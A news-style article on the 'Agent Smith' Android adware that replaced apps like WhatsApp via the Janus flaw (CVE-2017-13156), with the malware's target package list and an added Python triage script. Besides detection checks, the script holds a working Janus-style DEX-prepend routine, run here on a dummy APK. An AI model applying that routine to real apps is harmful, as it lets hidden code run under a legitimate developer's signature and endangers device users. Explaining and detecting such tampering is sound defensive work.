'Agent Smith' Android Malware Secretly Replacing WhatsApp and Others Infects 25 Million Devices

Android devices are no strangers to malware, most of it delivered through infected apps. Android users can install apps not only from the Google Play Store but from any number of third-party sources, which is where most malicious apps come from, whereas iPhone users get their apps almost exclusively from Apple's tightly controlled and mostly malware-free App Store. The most recent rash of malware-laden apps is a family dubbed Agent Smith, which is notable for silently replacing WhatsApp and other installed apps on Android devices.

The Agent Smith Android malware exploits Android vulnerabilities to replace legitimately installed apps with infected copies without the user noticing. The primary apps Agent Smith was found to replace are WhatsApp, Flipkart, Opera Mini and, reportedly, apps from Lenovo and SwiftKey.

One thing to note about WhatsApp being targeted is its sheer reach: the app has over 1.5 billion active users in over 180 countries, although only a portion of them are on Android. Check Point puts the number of infected Android devices at roughly 25 million so far.

Where does Agent Smith come from?

Check Point discovered the Agent Smith malware and named it after the character Agent Smith from The Matrix films, since, like the film's character, it spreads by replacing what is already there with copies of itself.

The core module of Agent Smith carries a default, hard-coded list of apps to look for on an infected device (Check Point reports the list can also be updated from the malware's command-and-control server). The entries, as published by Check Point, are package-name fragments (WhatsApp's package, for example, is com.whatsapp):

  • whatsapp
  • lenovo.anyshare.gps
  • mxtech.videoplayer.ad
  • jio.jioplay.tv
  • jio.media.jiobeats
  • jiochat.jiochatapp
  • jio.join
  • good.gamecollection
  • opera.mini.native
  • startv.hotstar
  • meitu.beautyplusme
  • domobile.applock
  • touchtype.swiftkey
  • flipkart.android
  • cn.xender
  • eterno
  • truecaller

As for where the malware originated, security researchers believe it was produced by a Chinese Internet company that helps Chinese Android developers publish and market their apps in foreign markets. The malware was first found on the third-party app store 9Apps and has mostly targeted Android users in India, Pakistan and Bangladesh. Of the roughly 25 million infected devices, however, just over 300,000 were detected in the United States and over 130,000 in the UK.

Agent Smith has a deceptive agenda

In some instances, Check Point's researchers found Agent Smith disguised as a Google-related app, which further deflects suspicion from Android users. The end goal of the attack is to display fraudulent advertisements on infected devices, letting the crooks behind the malware make money through ad-impression or click-fraud campaigns.

As to the makeup of Agent Smith, researchers compared its samples with known threats and found that it relies on the Janus vulnerability (CVE-2017-13156), an Android flaw that lets an attacker modify an APK without invalidating its v1 (JAR) signature, so an installed application can be replaced with an infected version that still appears to be signed by its developer. Disguising malicious code as a legitimate app is an old technique, used countless times on Windows PCs, Macs and mobile devices to gain a foothold on a system and act without the user's awareness.
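The Janus trick is easiest to understand at the byte level. The following is an added example, written for this article and not code from Check Point or from the Agent Smith malware: it builds a constructed stand-in APK (a plain ZIP with a fake manifest and classes.dex, no real code or signature), applies a Janus-style DEX prepend with the ZIP offset fix-up that keeps the archive and its v1 signature parsable, and runs the two structural checks a triage script would run on a file pulled from a device: is there DEX magic where the ZIP local header should be, and is there an APK Signing Block (v2/v3, whole-file signature) in front of the central directory. The signing block it inserts is a layout placeholder only; real blocks come from apksigner.

```python
"""Structural checks for Janus-style (CVE-2017-13156) tampering of an APK.
Janus prepends a DEX image to a v1-signed APK and shifts the ZIP offsets so the
archive still parses.  The JAR (v1) signature only covers ZIP entries, so it still
verifies, while the Android runtime sees DEX magic at offset 0 and runs the
attacker's code.  APK Signature Scheme v2/v3 signs the whole file instead.
"""
import io
import struct
import zipfile

DEX_MAGIC = b"dex\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_CENTRAL_HEADER = b"PK\x01\x02"
EOCD_SIGNATURE = b"PK\x05\x06"
APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"

def find_eocd(data: bytes) -> int:
    """Offset of the ZIP End Of Central Directory record (last occurrence), or -1."""
    return data.rfind(EOCD_SIGNATURE)

def central_directory(data: bytes) -> tuple:
    """(size, offset) of the central directory, read from EOCD+12 / EOCD+16."""
    eocd = find_eocd(data)
    if eocd < 0:
        raise ValueError("no EOCD record: not a ZIP/APK")
    return struct.unpack_from("<II", data, eocd + 12)

def is_janus_prepended(data: bytes) -> bool:
    """True if DEX magic, not a ZIP local file header, sits at offset 0."""
    return data.startswith(DEX_MAGIC)

def has_apk_signing_block(data: bytes) -> bool:
    """True if an APK Signing Block (v2/v3) ends with its magic right before the CD."""
    _, cd = central_directory(data)
    return cd >= 16 and data[cd - 16:cd] == APK_SIG_BLOCK_MAGIC

def assess(data: bytes) -> str:
    """One-line verdict for a file that claims to be an APK."""
    if is_janus_prepended(data):
        return "SUSPICIOUS: DEX header precedes ZIP data (Janus-style tampering)"
    if not data.startswith(ZIP_LOCAL_HEADER):
        return "UNKNOWN: not a ZIP/APK"
    if has_apk_signing_block(data):
        return "OK: v2/v3 signing block present (whole-file signature)"
    return "WEAK: v1-only signature; Janus tampering would still verify on Android 5.0-8.0"

def zip_entry_names(data: bytes) -> list:
    """Entry names as a ZIP parser sees them (works even after Janus prepending)."""
    return zipfile.ZipFile(io.BytesIO(data)).namelist()

def build_sample_apk() -> bytes:
    """Constructed stand-in APK: a ZIP holding a manifest and a fake classes.dex."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
    return buf.getvalue()

def add_placeholder_signing_block(apk: bytes) -> bytes:
    """Insert an empty but well-formed APK Signing Block before the central
    directory (layout only; a real block from apksigner carries signatures)."""
    _, cd = central_directory(apk)
    size = 8 + 16                       # second size field + magic, no ID-value pairs
    block = struct.pack("<Q", size) + struct.pack("<Q", size) + APK_SIG_BLOCK_MAGIC
    out = bytearray(apk[:cd] + block + apk[cd:])
    eocd = find_eocd(bytes(out))
    struct.pack_into("<I", out, eocd + 16, cd + len(block))   # move CD offset
    return bytes(out)

def janus_prepend(apk: bytes, dex: bytes) -> bytes:
    """Janus-style tampering: put a DEX image in front of the APK and add
    len(dex) to every ZIP offset so the archive (and its v1 signature) still
    checks out, while the runtime executes the DEX at offset 0."""
    shift = len(dex)
    out = bytearray(dex + apk)
    eocd = find_eocd(bytes(out))
    cd_size, cd_off = struct.unpack_from("<II", out, eocd + 12)
    cd_off += shift
    struct.pack_into("<I", out, eocd + 16, cd_off)
    pos, end = cd_off, cd_off + cd_size
    while pos < end:                    # walk the central directory headers
        if out[pos:pos + 4] != ZIP_CENTRAL_HEADER:
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", out, pos + 28)
        local_off = struct.unpack_from("<I", out, pos + 42)[0]
        struct.pack_into("<I", out, pos + 42, local_off + shift)
        pos += 46 + name_len + extra_len + comment_len
    return bytes(out)

if __name__ == "__main__":
    clean = build_sample_apk()
    for label, sample in [("v1-only", clean),
                          ("v2 block", add_placeholder_signing_block(clean)),
                          ("janus", janus_prepend(clean, b"dex\n035\x00" + b"\x00" * 32))]:
        print(f"{label:9} {zip_entry_names(sample)} -> {assess(sample)}")
```

Two caveats. The checks are structural, not cryptographic: a real verdict comes from `apksigner verify --verbose`, which actually validates the v1/v2/v3 signatures. And the presence of a v2/v3 block only protects devices that verify it; Android 5.0 and 6.0 only implement v1, so the Janus-modified file still installs there until the December 2017 platform patch for CVE-2017-13156 is applied, which is why keeping the OS updated matters as much as where the APK came from. ZIP64 archives are not handled.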

App developers have been made aware of the Agent Smith threat, but ultimately it is up to Android users to take the proper precautions. Install apps only from trusted sources and avoid third-party app stores, uninstall apps you do not recognize, and keep the device's Android version and security patches current, since the Janus flaw Agent Smith relies on was fixed by Google in December 2017. Users can also enable built-in protections such as Google Play Protect or run a mobile security product that blocks adware-laden apps. Either way, we haven't seen the last of Agent Smith or other emerging malware threats, and we must stay vigilant every step of the way, because nobody wants to get caught in THIS Matrix.